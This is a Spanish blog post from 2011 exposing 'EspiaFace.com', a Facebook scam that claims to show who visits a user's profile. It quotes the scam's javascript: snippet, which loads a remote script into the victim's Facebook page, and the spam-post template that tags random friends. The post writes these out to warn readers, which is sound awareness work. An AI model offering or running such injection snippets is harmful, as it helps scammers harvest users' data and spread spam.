RSS

Averigua quien visita tu perfil en Facebook es un fraude !!!!!

28 Abr

Desde hace unos días se ha propagado rápidamente en Facebook una supuesta manera de saber quien ha visitado tu perfil, el supuesto servicio viene un sitio fraudulento llamado EspiaFace.com, que aquí vamos a desenmascarar, pues todas las aplicaciones que te prometen saber quien ha visitado tu perfil en Facebook son una estafa esta nueva aplicación no es la excepción.

Viendo cómo funciona el servicio de EspiaFace.com te pide hacer una serie de cosas para supuestamente instalar el servicio en tu cuenta, para eso tienes que insertar un código en tu muro que tal vez muchos no entienden pero se trata de un simple JavaScript que toma de manera aleatoria algunos de tus amigos de tu cuenta y los coloca con un número de visitas ya predefinido.

El primero código que te pide insertar en la barra de direcciones es el siguiente:

javascript:(a=(b=document).createElement('script')).src='//app.espiaface.com/app.js?'

+Math.random(),b.body.appendChild(a);void(0)

En el código anterior lo único que hace es agregar el script de espiaface.com a tu Facebook para poder sacar los nombres de tus amigos.

Después te pide compartir el sitio en tu Facebook, supuestamente para que funcione, esto es lo más bajo que he visto para engañar a un usuario, aquí el único objetivo es propagar el fraude.

Y si lo anterior no fue suficiente te pide llenar una encuesta con la que los dueños del servicio ganan dinero, de nuevo engañando al usuario y si no completas la encuesta no podrás terminar, así que todos los que han caido en el fraude han llenado la encuesta.

Finalmente nos pide publicar el siguiente código en nuestro Facebook:

var postmessage = 'Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!';

En el código anterior lo que dice %tf% es donde se colocan de manera aleatoria nombre de tus amigos que se etiquetan en el mensaje, esto lo puedes comprobar haciendo varias veces el mismo procedimiento, donde siempre van a aparecer nombres diferentes y el mismo número de visitas.

Cómo puedes ver, si sabes algo de JavaScript, puedes ver que el supuesto servicio es un fraude total, y lo peor, es que miles de personas en Facebook creen que es verdad y están etiquetando a sus amigos para propagar el fraude.

Así que si tu también fuiste víctima de ser etiquetado por alguno de tus amigos como uno de los que más visitan su perfil cuando ni siquiera es verdad, comparte este este artículo con ellos para que no crean ese engaño.

thanks tchtstiko>

 
1 comentario

Publicado por en 28/04/2011 en Facebook

 

Una respuesta a “Averigua quien visita tu perfil en Facebook es un fraude !!!!!

  1. omar gb

    29/04/2011 at 5:23 AM

    freson sigue posteando!! lo del reloj excelente, lo de ubuntu mucho mejor, sube algo sobre NetBeans IDE, para crear software para Tecnologia movil!

     

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

 
A %d blogueros les gusta esto: